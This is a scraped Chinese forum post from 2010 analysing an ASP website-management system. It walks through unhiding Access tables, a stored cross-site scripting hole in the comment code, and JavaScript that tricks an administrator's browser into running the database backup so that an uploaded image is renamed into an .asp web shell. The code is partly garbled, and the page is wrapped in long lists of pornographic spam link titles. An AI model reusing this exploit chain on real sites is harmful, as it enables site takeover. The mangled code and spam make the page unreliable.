久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区

以文本方式查看主題

-  曙海教育集團(tuán)論壇  (http://www.rfoamep.cn/bbs/index.asp)
--  SQL Server數(shù)據(jù)庫(kù)  (http://www.rfoamep.cn/bbs/list.asp?boardid=67)
----  利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全  (http://www.rfoamep.cn/bbs/dispbbs.asp?boardid=67&id=2532)

--  作者:wangxinxin
--  發(fā)布時(shí)間:2010-12-13 13:47:46
--  利用or構(gòu)造SQL巧妙注射-分析睿智管理系統(tǒng)安全
前言:
???? 最近上cnzz下載了一套網(wǎng)站管理系統(tǒng),在源碼首頁(yè)發(fā)現(xiàn)它,心想cnzz都推薦應(yīng)該安全性相當(dāng)不錯(cuò)了.官方下載最新版本本地搭建IIS測(cè)試發(fā)現(xiàn)簡(jiǎn)潔易用,整體上安全做得不錯(cuò).由于是免費(fèi)版的,可能官方有點(diǎn)放水.不過(guò)這里不影響我們的分析,這里討論兩個(gè)方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數(shù)據(jù)庫(kù)
分析代碼經(jīng)常要用到數(shù)據(jù)庫(kù)(我分析的是Access版本的) ,習(xí)慣性的打開數(shù)據(jù)庫(kù),驚奇的發(fā)現(xiàn)只有一個(gè)notdown表,如圖01:
  
可是再仔細(xì)查看代碼發(fā)現(xiàn)不應(yīng)該只有這張表的,于是就想是不是隱藏起來(lái)了?第一次看到這種情況,于是就查看了下Access幫助說(shuō)明,在其中發(fā)現(xiàn)原來(lái)有還存在兩種屬性的數(shù)據(jù)表,即系統(tǒng)對(duì)象和隱藏對(duì)象.下面做一個(gè)小知識(shí)補(bǔ)充:
由于Access默認(rèn)是不顯示系統(tǒng)對(duì)象和隱藏對(duì)象的.所以如果一個(gè)表中存在隱藏對(duì)象或者系統(tǒng)對(duì)象那么就無(wú)法看到該表了. 簡(jiǎn)單說(shuō)下隱藏方法,設(shè)計(jì)好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對(duì)象了,默認(rèn)是看不到的.至于系統(tǒng)對(duì)象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個(gè)系統(tǒng)對(duì)象.這兩種方法都可以.
既然可以隱藏當(dāng)然也可以恢復(fù)顯示了, 按如下操作:“工具”菜單->“選項(xiàng)”命令->“視圖”選項(xiàng)卡->選中“顯示”一欄下的“系統(tǒng)對(duì)象”復(fù)選框或者"隱藏對(duì)象"復(fù)選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數(shù)據(jù)就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發(fā)現(xiàn)是一個(gè)評(píng)論顯示,在多個(gè)文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡(jiǎn)單的過(guò)濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請(qǐng)?zhí)顚懲暾偬峤?amp;quot;,"-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗(yàn)證碼錯(cuò)誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒有任何過(guò)濾,直接寫入數(shù)據(jù)庫(kù),跨站產(chǎn)生了.由于數(shù)據(jù)庫(kù)是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數(shù)據(jù)庫(kù)?進(jìn)入后臺(tái)看到數(shù)據(jù)庫(kù)備份,查看如圖03:
  
看到了沒,據(jù)庫(kù)路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實(shí)不然,還可以繼續(xù),經(jīng)驗(yàn)告訴我,他是將該輸入框?qū)懗蒱idden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測(cè)沒錯(cuò).那也就是說(shuō)同樣可以備份任意文件了.所有后臺(tái)拿shell比較簡(jiǎn)單了.(插馬備份數(shù)據(jù)庫(kù)比較麻煩,要繞過(guò)// 判斷瀏覽器類型并定義創(chuàng)建xmlhttp會(huì)話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點(diǎn)擊可在新窗口打開查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交

久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
91香蕉视频黄| 不卡欧美aaaaa| 一区二区三区在线免费观看| 国产精品免费丝袜| 国产精品久久久久9999吃药| 综合欧美亚洲日本| 亚洲一区二区三区中文字幕| 日欧美一区二区| 国产一区 二区 三区一级| 成人精品小蝌蚪| 国产免费一区二区| 亚洲黄色成人久久久| 欧美人体做爰大胆视频| 精品少妇一区二区三区| 国产精品久久久久桃色tv| 亚洲精品国产第一综合99久久| 亚洲成人在线观看视频| 国产精品一区一区三区| 成人激情av| 色综合天天天天做夜夜夜夜做| 欧美美女bb生活片| 国产精品久久久久久久久免费丝袜 | 91色porny蝌蚪| 麻豆91蜜桃| 777午夜精品视频在线播放| 国产欧美日韩卡一| 久久国产精品露脸对白| 成人免费视频网站| 欧美亚洲一区二区在线观看| 欧美极品另类videosde| 免费一级片91| 国产欧美日韩一区| 69堂亚洲精品首页| 亚洲最大的成人av| 97久久精品人人澡人人爽| 亚洲欧洲另类精品久久综合| 精品va天堂亚洲国产| 五月激情六月综合| 国产日韩久久| 欧美精品日日鲁夜夜添| 亚洲男人的天堂av| 成人h版在线观看| 色综合天天综合网天天看片| 国产亚洲精品资源在线26u| 日本va欧美va瓶| 99电影在线观看| 欧美高清视频不卡网| 亚洲在线观看免费视频| 99久久久国产精品免费蜜臀| 色综合久久久久综合| 国产精品不卡一区二区三区| 国产精品中文字幕日韩精品| 日韩一区免费观看| 国产欧美精品一区二区三区四区| 黄网站免费久久| 亚洲欧洲精品一区二区| 中文字幕一区二区三| 国产91精品一区二区麻豆亚洲| 一区二区三区四区五区视频| 最新日韩av在线| dy888夜精品国产专区| 日韩欧美的一区二区| 老司机免费视频一区二区三区| 精品一卡二卡三卡四卡日本乱码| 精品日韩一区二区三区免费视频| 蜜臀99久久精品久久久久久软件| 久久精品丝袜高跟鞋| 久久久久久久免费视频了| 国产精品自拍在线| 欧美日韩精品是欧美日韩精品| 亚洲一级在线观看| 免费一区二区三区在在线视频| 国产午夜精品在线观看| www.欧美色图| 精品少妇一区二区三区在线播放 | 国产91视觉| 久久免费国产精品| 99精品桃花视频在线观看| 91精品啪在线观看国产60岁| 极品美女销魂一区二区三区免费| 在线观看av不卡| 久久精品国产亚洲a| 日本高清无吗v一区| 亚洲gay无套男同| 亚洲午夜精品一区二区| 午夜精品久久久久影视| 亚洲 日韩 国产第一区| 亚洲在线成人精品| 亚洲开发第一视频在线播放| 亚洲成av人片| 色综合色综合色综合| 日韩国产在线观看| 在线视频一区二区免费| 久99久精品视频免费观看| 欧美日韩高清不卡| 成人免费精品视频| 国产欧美久久久精品影院| 极品尤物一区二区三区| 亚洲美女屁股眼交3| 亚洲v日韩v欧美v综合| 五月天视频一区| 欧美色国产精品| 大胆亚洲人体视频| 国产清纯美女被跳蛋高潮一区二区久久w | 成人h动漫精品一区二区| 亚洲精品一区二区三区福利| 91在线国产福利| 国产精品久久久久影院色老大| 精品无码久久久久国产| 亚洲第一搞黄网站| 欧美亚洲一区二区三区四区| 国产精品一区二区三区四区| 久久久久久综合| 免费观看成人在线| 日日嗨av一区二区三区四区| 欧美三级韩国三级日本一级| 国产高清在线精品| 中文字幕免费在线观看视频一区| 你懂的网址一区二区三区| 婷婷国产v国产偷v亚洲高清| 欧美亚男人的天堂| av在线免费不卡| 伊人开心综合网| 在线一区二区观看| 97精品视频在线观看自产线路二| 国产三级精品三级在线专区| 日本精品一区二区| 国产一区二区三区四| 国产精品青草久久| 亚洲人成人77777线观看| 国产精品亚洲人在线观看| 中文av一区二区| 在线观看一区日韩| 91麻豆自制传媒国产之光| 亚洲动漫第一页| 日韩欧美国产综合在线一区二区三区 | 亚洲aaa精品| 日韩精品中文字幕在线不卡尤物| 国产麻豆日韩| 国产在线观看一区二区| 日本一区二区三区在线观看| 亚洲欧洲日本国产| 99精品视频一区二区| 亚洲大片精品永久免费| 日韩一区二区三区免费看| 欧美亚洲另类在线一区二区三区| 国产一区视频导航| 一区二区三区在线看| 日韩一级欧美一级| 亚洲精品一区二区三区蜜桃久 | 久久激情综合网| 中文字幕一区av| 91精品中文字幕一区二区三区| 久久超碰亚洲| 成人黄色一级视频| 香蕉成人啪国产精品视频综合网| 日韩精品一区二区三区蜜臀 | 成人永久免费| 国产乱码精品一区二区三区av| 综合在线观看色| 欧美mv和日韩mv的网站| 色婷婷久久久久swag精品| 国产免费一区| 91最新地址在线播放| 精品一区二区三区视频| 国产精品麻豆网站| 日韩一区二区三区视频在线观看| 亚洲第一在线综合在线| 高清av免费一区中文字幕| 国产精品综合网| 日本成人在线一区| 亚洲六月丁香色婷婷综合久久 | 欧美视频一区二区三区四区| 久久青青草原| 成人h在线播放| 成人激情动漫在线观看| 精品无人码麻豆乱码1区2区| 香蕉久久一区二区不卡无毒影院 | 国产成人综合自拍| 日本麻豆一区二区三区视频| 亚洲乱码中文字幕综合| 国产精品久久久久久福利一牛影视| 日韩欧美在线观看一区二区三区| 在线观看日韩电影| 中文字幕成人一区| 欧美日韩在线播放一区二区| 岛国视频一区| av免费观看久久| 97久久天天综合色天天综合色hd| 国产+成+人+亚洲欧洲自线| 久久电影网电视剧免费观看| 首页国产丝袜综合| 五月天丁香久久| 亚瑟在线精品视频| 亚洲亚洲人成综合网络| 亚洲另类春色校园小说| 曰韩精品一区二区| 一区二区三区毛片| 亚洲一区二区视频| 亚洲电影你懂得|